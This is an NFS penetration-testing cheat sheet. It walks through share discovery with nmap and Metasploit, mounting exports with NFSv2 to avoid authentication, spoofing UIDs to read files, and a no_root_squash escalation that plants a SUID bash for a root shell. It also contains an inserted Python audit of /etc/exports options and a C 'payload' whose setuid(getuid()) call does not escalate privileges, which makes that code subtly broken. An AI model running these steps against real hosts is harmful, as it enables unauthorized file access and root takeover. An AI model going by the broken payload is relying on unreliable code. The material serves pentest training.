NFS
NFS usually uses ports 111 (rpcbind/portmapper) and 2049 (nfsd).
What is NFS?
NFS (Network File System) is a very stable and powerful file system for sharing storage devices between UNIX/Linux operating systems. Thanks to NFS, the same files can be accessed from multiple computers, which simplifies data storage: instead of installing an application on the local disk of every machine, it allows applications to be shared.

```
PORT     STATE SERVICE VERSION
2049/tcp open  nfs
```
NFS Pentesting
Port: 2049
Misconfigured NFS
A lot of data is obtained from file shares in most of the companies that undergo network penetration testing.
NFS Service Detection in Network with Nmap

```shell
nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount 10.10.x.x/24
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.10.x.x
```
Network NFS Service Detection with Metasploit
```
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS 10.10.x.x/24
msf auxiliary(nfsmount) > run
```
NFS Shares Listing With “showmount”
```shell
showmount -e 10.10.x.x
```
Access to discovered NFS shares
```shell
mount -t nfs 10.10.x.x:/export/home /mnt/connect_path
# Specify version 2, because it has no authentication or authorization.
mount -t nfs -o vers=2 10.10.x.x:/export/home /mnt/connect_path -o nolock
```
Access to discovered NFS shares with same user UID Permissions
In the terminal listing we can see the shared files and the UID of the user they belong to.

```
-rwxr----- 1923 1000 1898 example.doc
```
```shell
umount /connect_path
useradd newuser
usermod -u 1923 newuser
mount -t nfs 192.168.x.x:/export/home /home/newuser/Desktop/connect_path
```
NFS no_root_squash/no_all_squash misconfiguration PE
Read the /etc/exports file; if you find some directory that is configured as no_root_squash, then you can access it as a client and write inside that directory as if you were the local root of the machine.
no_root_squash: This option basically gives the root user on the client the authority to access files on the NFS server as root, and this can lead to serious security implications.
no_all_squash: This is similar to the no_root_squash option but applies to non-root users. Imagine you have a shell as the nobody user: check the /etc/exports file; the no_all_squash option is present; check the /etc/passwd file; emulate a non-root user; create a SUID file as that user (by mounting using NFS). Execute the SUID file as the nobody user and become a different user.
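As an added example (not part of the original post), a small Python audit that parses an /etc/exports file and flags the two squash options discussed above, together with world exports and the `insecure` option; the exports content is constructed for the example.

```python
import re

# Constructed /etc/exports content for this example (not taken from any real host).
SAMPLE_EXPORTS = """\
# exports file
/export/home  10.10.0.0/24(rw,sync,no_root_squash)
/srv/backup   *(rw,no_all_squash,insecure)
/srv/public   10.10.5.7 (ro)
/srv/data     192.168.1.0/24(rw,all_squash,anonuid=65534,anongid=65534)
"""

# Options this check flags, with the reason reported (no_root_squash and
# no_all_squash are the two misconfigurations described above).
RISKY_OPTIONS = {
    "no_root_squash": "client root is treated as server root",
    "no_all_squash": "client UIDs are trusted as-is, so any client UID can be emulated",
    "insecure": "requests from unprivileged source ports are accepted",
}

# A client spec is host(opts); an empty host before '(' means "everyone".
SPEC_RE = re.compile(r"(\S*)\((.*?)\)")

def parse_exports(text):
    """Return (path, client, [options]) tuples from /etc/exports text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = SPEC_RE.fullmatch(spec)
            if m is None:                      # bare host, exportfs defaults apply
                entries.append((path, spec, []))
                continue
            client = m.group(1) or "*"         # "host (ro)" exports to the world
            entries.append((path, client, [o for o in m.group(2).split(",") if o]))
    return entries

def audit_exports(text):
    """Return (path, client, issue) findings; an empty list means nothing flagged."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to every host"))
        for opt in opts:
            if opt in RISKY_OPTIONS:
                findings.append((path, client, f"{opt}: {RISKY_OPTIONS[opt]}"))
    return findings
```

Note that `10.10.5.7 (ro)` with a space before the parenthesis is parsed the way exportfs parses it: the host gets defaults and the `(ro)` spec applies to everyone.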
Privilege Escalation
Remote Exploit
If you have found this vulnerability, you can exploit it: mount that directory on a client machine, as root copy the /bin/bash binary inside the mounted folder and give it SUID rights, then execute that bash binary from the victim machine.
```shell
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash

#Victim
cd <SHARED_FOLDER>
./bash -p #ROOT shell
```
```c
//gcc payload.c -o payload
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}
```
Reference: https://secybr.com/posts/nfs-pentesting-best-practicies/